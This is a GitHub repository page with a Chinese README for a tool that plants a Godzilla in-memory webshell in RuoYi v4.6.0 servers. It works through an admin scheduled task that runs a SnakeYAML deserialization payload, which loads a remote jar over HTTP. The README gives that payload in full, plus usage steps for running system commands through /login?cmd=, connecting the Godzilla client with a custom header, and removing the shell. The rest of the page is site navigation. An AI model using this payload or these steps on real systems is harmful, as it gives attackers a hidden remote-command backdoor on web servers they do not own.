GitHub - M0untainShley/yaml-payload-for-ruoyi-godzilla: ruoyi 后台定时任务注入哥斯拉内存马

yaml-payload-for-ruoyi

测试环境

ruoyi v4.6.0

用法

使用 mvn clean package 打包生成 jar，或者直接下载 release 中的 jar，放在 web 路径下

ruoyi 后台创建定时任务

payload

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:12346/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"] 
  ]]
]')

执行定时任务

web 服务器接受到请求

执行命令 /login?cmd=whoami

哥斯拉连接，需要配置请求头 X-Cmd-Ruoyi: 任意字符串

连接地址 /login?cmd=1，有 cmd 参数即可

删除内存马 /login?cmd=delete

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
.idea		.idea
img		img
src/main		src/main
.gitignore		.gitignore
README.md		README.md
pom.xml		pom.xml
yaml-payload-for-ruoyi-1.0-SNAPSHOT-noheader.jar		yaml-payload-for-ruoyi-1.0-SNAPSHOT-noheader.jar

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

yaml-payload-for-ruoyi

测试环境

用法

参考

About

Releases 1

Packages

Languages

M0untainShley/yaml-payload-for-ruoyi-godzilla

Folders and files

Latest commit

History

Repository files navigation

yaml-payload-for-ruoyi

测试环境

用法

参考

About

Resources

Stars

Watchers

Forks

Releases 1

Packages 0

Languages

Packages